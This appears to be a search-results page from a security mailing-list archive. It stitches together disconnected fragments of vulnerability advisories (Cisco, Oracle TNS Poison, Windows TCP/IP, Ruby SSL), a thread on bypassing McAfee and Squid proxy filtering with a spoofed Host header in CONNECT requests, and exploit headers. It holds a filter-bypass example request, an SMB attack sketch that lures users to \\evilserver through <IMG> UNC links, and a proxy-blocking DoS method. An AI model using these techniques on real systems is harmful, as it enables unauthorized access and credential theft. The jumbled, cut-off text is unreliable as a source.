Next Page >>
reconnect
inaccessible by means of the prefetch cache control directive.
The procedure is very simple, sending several times a simple GET
HTTP/1.1 request to the victim URL will make the proxies no longer
serve it. Users will be waiting for about two minutes and then the TCP
connection will be closed, which depending on the user agent it will
be interpreted as a valid zero-length HTTP 0.9 reply or an error.
It is worth noting that this attack affects the URL EXACTLY. For
instance, attacking http://www.google.com/ will not block
http://www.google.com./ (notice the dot before the last slash), nor
to the latest one (Oracle 11g) without the CPU-APR-2012. The bug was
reported to Oracle in 2008 so it "only" took them 4 years to fix the
vulnerability since reported.
The vulnerability I called TNS Poison affects the component called TNS
Listener, which is the responsible of connections establishment. To
exploit the vulnerability no privilege is needed, just network access to
the TNS Listener. The “feature” exploited is enabled by default in all
Oracle versions starting with Oracle 8i and ending with Oracle 11g
(without CPU-APR-2012).
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unity Connection
Advisory ID: cisco-sa-20120229-cuc
Revision 1.0
For Public Release 2012 February 29 16:00 UTC (GMT)
Summary
=======
Cisco IOS Software Release, 15.1(2)T is affected by a denial of
service (DoS) vulnerability during the TCP establishment phase. The
vulnerability could cause embryonic TCP connections to remain in a
SYNRCVD or SYNSENT state. Enough embryonic TCP connections in these
states could consume system resources and prevent an affected device
from accepting or initiating new TCP connections, including any
TCP-based remote management access to the device.
To be clear, the CONNECT request is a single request/response cycle between the client and the proxy. Any request body is nonsensical and should be ignored by the proxy (or the request can be rejected if the proxy wants to be pedantic). There is nothing that explicitly disallows inclusion of the host header in a CONNECT request. Granted, including the host header incurs some degree of ambiguity (the FQDN may resolve to the IP address, but the IP address is not guaranteed to resolve to the FQDN), but this is clearly a debatable choice on the developer's part as to whether it should be used to determine traffic policy applicability for this request.
The proxy should only ignore further data between the client and remote if the proxy successfully established a TCP connection between them on the specified destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the proxy should either queue or reject further communication from the client until the TCP connection has been successfully established and the proxy has responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error response to the client and close the client-to-proxy connection.
Likewise, while the proxy does establish the end-to-end TCP connection between the client and upstream server, it is not responsible for any part of the encryption that may be involved in that communication - unless it specifically offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL Forward Proxy (other vendors have similar features).
Also, whether the McAffee proxy allows translating normal HTTP methods to CONNECT, then tunneling them to the upstream proxy is irrelevant to the question of whether the local proxy actually uses the host header or the host portion of the CONNECT request to determine policy applicability.
exhaustive).
Since this problem was also found on Windows versions as old as Windows
NT4, this scenario might still be possible.
(ii) An attacker A connects to system S and sends mutiple 'SMB
Negotiate Protocol Request' packets with the 'Flags2' field set to
0xc001 to obtain several challenges, and stores them. The attacker A
then forces a user U on system S to connect to his own specially crafted
SMB server, for example by sending an email with multiple <IMG> tags
with UNC links (e.g.: <IMG SRC=\\evilserver\share\a.jpg>) or a link to
Cisco IOS Software contains a vulnerability when the Cisco IOS SSL
VPN feature is configured with an HTTP redirect. Exploitation could
allow a remote, unauthenticated user to cause a memory leak on the
affected devices, that could result in a memory exhaustion condition
that may cause device reloads, the inability to service new TCP
connections, and other denial of service (DoS) conditions.
Cisco has released free software updates that address this
vulnerability. There is a workaround to mitigate this vulnerability.
This advisory is posted at
=======
Cisco ASA 5500 Series Adaptive Security Appliances are affected by the
following vulnerabilities:
* TCP Connection Exhaustion Denial of Service Vulnerability
* Session Initiation Protocol (SIP) Inspection Denial of Service
Vulnerabilities
* Skinny Client Control Protocol (SCCP) Inspection Denial of
Service Vulnerability
* WebVPN Datagram Transport Layer Security (DTLS) Denial of Service
SIP processing errors.
IPSec Client Authentication Processing Vulnerability
Cisco PIX and Cisco ASA devices that terminate remote access VPN
connections are vulnerable to a denial of service attack if the
device is running software versions prior to 7.2(4)2, 8.0(3)14, and
8.1(1)4. Cisco PIX and Cisco ASA devices that run software versions
7.0 and 7.1 are not affected by this vulnerability.
SSL VPN Memory Leak Vulnerability
??
I'm unclear - exactly how does an ICMP echo cycle have anything to do with the apparent disparity between the host portion of the CONNECT URI and the contents of the host header?
I can see the logic in :
1. comparing the HOST header to the host portion of the CONNECT URI
2. resolving either to a name or IP address (depending on its original state)
3. comparing the resolved results to each other (DNS RR records will be an interesting case)
The thing to bear in mind is that reverse resolution (IP-to-name) on the Internet tends to be flaky to the point of completely useless.
There are two main problems:
In McAfee Web Gateway it is possible to convert GET methods in CONNECT
methods, and after the connection, send the same get packet, without
modification and without cryptography. Even with the get packets
passing through the proxy without cryptography and with the Host field
pointing to a filtered site, the proxy will accept.
I think it is a vulnerability!
See my python code.
Thanks
disclosure and man in the middle attacks.
Background:
Aten produces several IP KVM Switches. This devices can be used like a
normal kvm switch with an attached keyboard, mouse and monitor.
However, it is also possible to access the hosts connected to the kvm
switch via a network using an ordinary PC as a client. As this can
also be used via an insecure network, it is very important that this
connection is cryptographically protected against sniffing of
confidential data (e.g. keystrokes, monitor signals) and man in the
middle attacks. The affected products provide an SSL encrypted web
What I understand from the advisory is the Squid proxy is basing its
filtering on the Host header when present, even for the CONNECT
command which doesn't allow this header at all as it makes no sense. I
haven't confirmed the bug but what's being described is definitely a
vulnerability.
There's also a small misconception in what you said. The proxy will
see the entire CONNECT request, headers and all - after the request
headers there'll be a pair of newlines, and only *then* the remaining
data is tunneled transparently. So it's the second request's headers
Hello,
We might be able to fix this by simply doing a ping to the website
before connecting, so that the IP of the host specified matches the
connect field. In any case, the consistency of the host and connect is
indeed a big design flaw.
- Vikram
On Mon, Apr 16, 2012 at 6:12 PM, Gabriel Menezes Nunes
Devices running software versions on the 8.0 release that are
configured for Telnet, Secure Shell (SSH), WebVPN, SSL VPN, or ASDM
enabled are affected by this vulnerability.
The telnet command is used identify the IP addresses from which the
security appliance accepts Telnet connections.
ASA(config)# telnet 192.168.10.0 255.255.255.0 inside
In the previous example, the Cisco ASA is configured to accept Telnet
connections on the inside interface from the 192.168.10.0/24 network.
Oracle is a widely-deployed Database Management System (DBMS) that supports a variety of applications. Many multi-tier applications are designed to use proxy authentication, restricting a middle tier to establish the database connection on behalf of the users. The standard authentication mechanism requires the client, the middle tier in this case, to provide valid credentials in order to authenticate and connect to the DBMS. User sessions are then created through the proxy connection. Oracle TNS protocol messages are used for session setup, authentication and data transfer.
Scope
Imperva’s Application Defense Center (ADC) conducts extensive research on enterprise applications and databases. During its research, the team has identified a vulnerability in Oracle’s proxy authentication and access control mechanism.
Findings
A forward proxy server when presented with a CONNECT request is solely responsible for attempting to facilitate an end-to-end encrypted path between the requesting client and the far end server. The CONNECT method does no more than create a temporary hole in your firewall.
Only once that is done is a normal HTTP request, including headers such as the Host: header, passed over the encrypted path by the client. Most crucially, the proxy server cannot see the HTTP request or its headers due to the end-to-end encryption. You can use the encrypted path to carry any protocol or data you like and the proxy server is quite oblivious to it as it is opaque to the proxy.
The only access control that the proxy server can perform is based on the CONNECT method request and the server identified in it by either IP number or FQDN and port.
You do not say what the acl is that you have asked Squid to apply but it cannot involve any examination of the Host: header of a request if the CONNECT method is used; only the far end server can see that.
The same conclusion also applies to your other post about a vulnerability with "McAfee Web Gateway URL Filtering Bypass"
Date: 09.09.2009
________________________________________________________________________
Vendor: Microsoft Corporation
Product: Microsoft Windows XP/Vista TCP/IP-Stack
Vulnerability: TCP/IP Orphaned Connections Vulnerability
Affected Releases: Windows Vista Business SP1/ Windows XP SP3
Severity: Moderate
CVE: CVE-2009-1926
________________________________________________________________________
# CVE: CVE-2012-2212
I found a vulnerability in McAfee Web Gateway 7 that allows access to
filtered sites.
The appliance believes in the Host field of HTTP Header using CONNECT method.
Example
CONNECT 66.220.147.44:443 HTTP/1.1
Host: www.facebook.com
Vendor: Ruby
Vendor URL: http://www.ruby-lang.org
Versions affected: 1.8.5, 1.8.6, Trunk Ruby
Systems Affected: All Ruby Platforms
Severity: Medium - Compromise of SSL connection integrity
Author: Chris Clark <cclark[at]isecpartners[dot]com>
Vendor notified: Yes
Public release: Yes
Advisory URL: http://www.isecpartners.com/advisories/2007-006-rubyssl.txt
/*
Family Connections <= 1.8.2 - Remote Shell Upload Exploit
Author: Salvatore "drosophila" Fresta
Contact: drosophilaxxx@gmail.com
Date: 3 April 2009
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Firebird SQL op_connect_request main listener shutdown vulnerability
1. *Advisory Information*
Title: Firebird SQL op_connect_request main listener shutdown vulnerability
if APR_HAS_UNICODE_FS is set to 1 then we have defined charset and this is present on Windows systems . But on on unix , linux systems the charset is not definded.
- --- EXAMPLE 1 ---
# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'
GET /icons/ http/1.1
Host: localhost
Content-type: text/html
OpenSSH 4.X deny remote connections.
The service itself doesn't crash, but it does NOT allow anyone to connect after 10 or so pending connections.
To reproduce:
telnet 3.1.33.7 22
Step-by-step instructions for debugging IOS using gdb - Andy Davis,
2008 (iosftpexploit "at" googlemail <dot> com):
I have been asked by many people for a simple step-by-step guide for
setting up an IOS exploit development environment, which includes
connecting to a Cisco router using gdb, so here goes:
(By the way the router I connect to is a Cisco 2621XM)
Installing and configuring minicom:
******* Salvatore "drosophila" Fresta *******
[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 1 Apr 2009
of other methods are CRAM-MD5 or DIGEST-MD5.
Example for the "port 25" service:
$ telnet server.example.com 25
Connected to server.example.com.
Escape character is '^]'.
220 server.example.com ESMTP Postfix
ehlo client.example.com
250-server.example.com
250-PIPELINING
Vendor description:
---------------
The SonicWALL Global VPN Client provides mobile users with access to
mission-critical network resources by establishing secure connections to
their office network's IPSec-compliant SonicWALL VPN gateway.
Vulnerabilty overview:
---------------
Affected Products
=================
This vulnerability affects all unfixed versions of Cisco IOS XR
Software devices configured to accept SSHv1 connections. Details on
the affected versions can be found in the Software Versions and Fixes
section of this advisory.
Vulnerable Products
+------------------
The other possible exploit is that I work for company X. After being fired from company X I setup a second rogue network and have people connect to it. Thus giving me the option to steal passwords or present false information via a fake intranet site or whatever. Since I worked there I already know the wpa key.
Sent wirelessly from my BlackBerry device on the Bell network.
Envoyé sans fil par mon terminal mobile BlackBerry sur le réseau de Bell.
-----Original Message-----
From: Security Mailing List <s3clist@hotmail.com>
Date: Thu, 15 Mar 2012 10:33:19
To: Zach C.<fxchip@gmail.com>
Next Page>>
|
